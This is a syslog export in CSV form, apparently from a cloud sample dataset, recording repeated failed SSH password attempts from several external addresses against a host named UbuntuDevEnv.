+5966,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:06,UbuntuDevEnv,2019-06-26 16:36:06,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 51732:11: Normal Shutdown, Thank you for playing [preauth]",38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,51732,,
+5967,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:06,UbuntuDevEnv,2019-06-26 16:36:06,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 35.154.19.93 port 51732 [preauth],38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,51732,,
+5968,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:36,UbuntuDevEnv,2019-06-26 16:36:35,auth,UbuntuDevEnv,info,Invalid user gpadmin from 35.154.19.93 port 55018,38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,55018,,
+5969,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:36,UbuntuDevEnv,2019-06-26 16:36:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5970,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:36,UbuntuDevEnv,2019-06-26 16:36:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+5971,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:38,UbuntuDevEnv,2019-06-26 16:36:37,auth,UbuntuDevEnv,info,Failed password for invalid user gpadmin from 35.154.19.93 port 55018 ssh2,38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,55018,,
+5972,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:38,UbuntuDevEnv,2019-06-26 16:36:37,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 55018:11: Normal Shutdown, Thank you for playing [preauth]",38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,55018,,
+5973,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:38,UbuntuDevEnv,2019-06-26 16:36:37,auth,UbuntuDevEnv,info,Disconnected from invalid user gpadmin 35.154.19.93 port 55018 [preauth],38151,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,55018,,
+5974,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:50,UbuntuDevEnv,2019-06-26 16:36:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.167.62.188  user=root,38194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,59.167.62.1,,0,
+5975,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:51,UbuntuDevEnv,2019-06-26 16:36:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.157.99  user=test,38209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,157.230.157.9,,0,
+5976,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:53,UbuntuDevEnv,2019-06-26 16:36:52,auth,UbuntuDevEnv,info,Failed password for root from 59.167.62.188 port 60254 ssh2,38194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.167.62.1,60254,,
+5977,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:53,UbuntuDevEnv,2019-06-26 16:36:53,auth,UbuntuDevEnv,info,"Received disconnect from 59.167.62.188 port 60254:11: Normal Shutdown, Thank you for playing [preauth]",38194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.167.62.1,60254,,
+5978,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:53,UbuntuDevEnv,2019-06-26 16:36:53,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 59.167.62.188 port 60254 [preauth],38194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,59.167.62.1,60254,,
+5979,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:54,UbuntuDevEnv,2019-06-26 16:36:53,auth,UbuntuDevEnv,info,Failed password for test from 157.230.157.99 port 49668 ssh2,38209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.157.9,49668,,
+5980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:54,UbuntuDevEnv,2019-06-26 16:36:53,auth,UbuntuDevEnv,info,"Received disconnect from 157.230.157.99 port 49668:11: Normal Shutdown, Thank you for playing [preauth]",38209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.157.9,49668,,
+5981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:54,UbuntuDevEnv,2019-06-26 16:36:53,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 157.230.157.99 port 49668 [preauth],38209,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,157.230.157.9,49668,,
+5982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:03,UbuntuDevEnv,2019-06-26 16:37:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:03,UbuntuDevEnv,2019-06-26 16:37:03,auth,UbuntuDevEnv,info,Invalid user admin from 81.0.212.18 port 59912,38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,81.0.212.1,59912,,
+5984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:03,UbuntuDevEnv,2019-06-26 16:37:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+5985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:06,UbuntuDevEnv,2019-06-26 16:37:06,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 81.0.212.18 port 59912 ssh2,38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,81.0.212.1,59912,,
+5986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:06,UbuntuDevEnv,2019-06-26 16:37:06,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 81.0.212.18 port 59912 [preauth],38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,81.0.212.1,59912,,
+5987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:06,UbuntuDevEnv,2019-06-26 16:37:06,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 59912:11: Bye Bye [preauth],38254,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,59912,,
+5988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:10,UbuntuDevEnv,2019-06-26 16:37:10,auth,UbuntuDevEnv,info,Invalid user gpadmin from 35.154.19.93 port 58296,38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,58296,,
+5989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:10,UbuntuDevEnv,2019-06-26 16:37:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:10,UbuntuDevEnv,2019-06-26 16:37:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+5991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:11,auth,UbuntuDevEnv,info,Failed password for invalid user gpadmin from 35.154.19.93 port 58296 ssh2,38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,58296,,
+5992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:11,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 58296:11: Normal Shutdown, Thank you for playing [preauth]",38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,58296,,
+5993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:11,auth,UbuntuDevEnv,info,Disconnected from invalid user gpadmin 35.154.19.93 port 58296 [preauth],38280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gpadmin,35.154.19.9,58296,,
+5994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:12,auth,UbuntuDevEnv,info,Invalid user pul from 80.108.220.67 port 55374,38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,80.108.220.6,55374,,
+5995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:12,UbuntuDevEnv,2019-06-26 16:37:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+5997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:14,UbuntuDevEnv,2019-06-26 16:37:13,auth,UbuntuDevEnv,info,Failed password for invalid user pul from 80.108.220.67 port 55374 ssh2,38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,80.108.220.6,55374,,
+5998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:14,UbuntuDevEnv,2019-06-26 16:37:14,auth,UbuntuDevEnv,info,Disconnected from invalid user pul 80.108.220.67 port 55374 [preauth],38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,80.108.220.6,55374,,
+5999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:14,UbuntuDevEnv,2019-06-26 16:37:14,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 55374:11: Bye Bye [preauth],38270,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,55374,,
+6000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:20,UbuntuDevEnv,2019-06-26 16:37:20,auth,UbuntuDevEnv,info,Disconnected from 171.8.199.77 port 55252 [preauth],38294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,55252,,
+6001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:20,UbuntuDevEnv,2019-06-26 16:37:20,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 55252:11: Bye Bye [preauth],38294,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,55252,,
+6002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:42,UbuntuDevEnv,2019-06-26 16:37:42,auth,UbuntuDevEnv,info,Invalid user webadmin from 35.154.19.93 port 33402,38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,33402,,
+6003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:42,UbuntuDevEnv,2019-06-26 16:37:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:42,UbuntuDevEnv,2019-06-26 16:37:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:44,UbuntuDevEnv,2019-06-26 16:37:44,auth,UbuntuDevEnv,info,Failed password for invalid user webadmin from 35.154.19.93 port 33402 ssh2,38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,33402,,
+6006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:44,UbuntuDevEnv,2019-06-26 16:37:44,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 33402:11: Normal Shutdown, Thank you for playing [preauth]",38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,33402,,
+6007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:37:44,UbuntuDevEnv,2019-06-26 16:37:44,auth,UbuntuDevEnv,info,Disconnected from invalid user webadmin 35.154.19.93 port 33402 [preauth],38394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,33402,,
+6008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:15,UbuntuDevEnv,2019-06-26 16:38:14,auth,UbuntuDevEnv,info,Invalid user webadmin from 35.154.19.93 port 36678,38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,36678,,
+6009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:15,UbuntuDevEnv,2019-06-26 16:38:14,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:15,UbuntuDevEnv,2019-06-26 16:38:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:17,UbuntuDevEnv,2019-06-26 16:38:16,auth,UbuntuDevEnv,info,Failed password for invalid user webadmin from 35.154.19.93 port 36678 ssh2,38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,36678,,
+6012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:17,UbuntuDevEnv,2019-06-26 16:38:16,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 36678:11: Normal Shutdown, Thank you for playing [preauth]",38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,36678,,
+6013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:17,UbuntuDevEnv,2019-06-26 16:38:16,auth,UbuntuDevEnv,info,Disconnected from invalid user webadmin 35.154.19.93 port 36678 [preauth],38507,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webadmin,35.154.19.9,36678,,
+6014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:30,UbuntuDevEnv,2019-06-26 16:38:30,auth,UbuntuDevEnv,info,Invalid user suejoe from 81.0.212.18 port 40985,38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suejoe,81.0.212.1,40985,,
+6015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:30,UbuntuDevEnv,2019-06-26 16:38:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:30,UbuntuDevEnv,2019-06-26 16:38:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:32,UbuntuDevEnv,2019-06-26 16:38:31,auth,UbuntuDevEnv,info,Failed password for invalid user suejoe from 81.0.212.18 port 40985 ssh2,38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suejoe,81.0.212.1,40985,,
+6018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:32,UbuntuDevEnv,2019-06-26 16:38:31,auth,UbuntuDevEnv,info,Disconnected from invalid user suejoe 81.0.212.18 port 40985 [preauth],38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suejoe,81.0.212.1,40985,,
+6019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:32,UbuntuDevEnv,2019-06-26 16:38:31,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 40985:11: Bye Bye [preauth],38572,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,40985,,
+6020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:45,UbuntuDevEnv,2019-06-26 16:38:45,auth,UbuntuDevEnv,info,Invalid user elastic from 35.154.19.93 port 39968,38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,39968,,
+6021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:45,UbuntuDevEnv,2019-06-26 16:38:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:45,UbuntuDevEnv,2019-06-26 16:38:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:48,UbuntuDevEnv,2019-06-26 16:38:47,auth,UbuntuDevEnv,info,Failed password for invalid user elastic from 35.154.19.93 port 39968 ssh2,38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elastic,35.154.19.9,39968,,
+6024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:38:48,UbuntuDevEnv,2019-06-26 16:38:48,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 39968:11: Normal Shutdown, Thank you for playing [preauth]",38623,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,39968,,
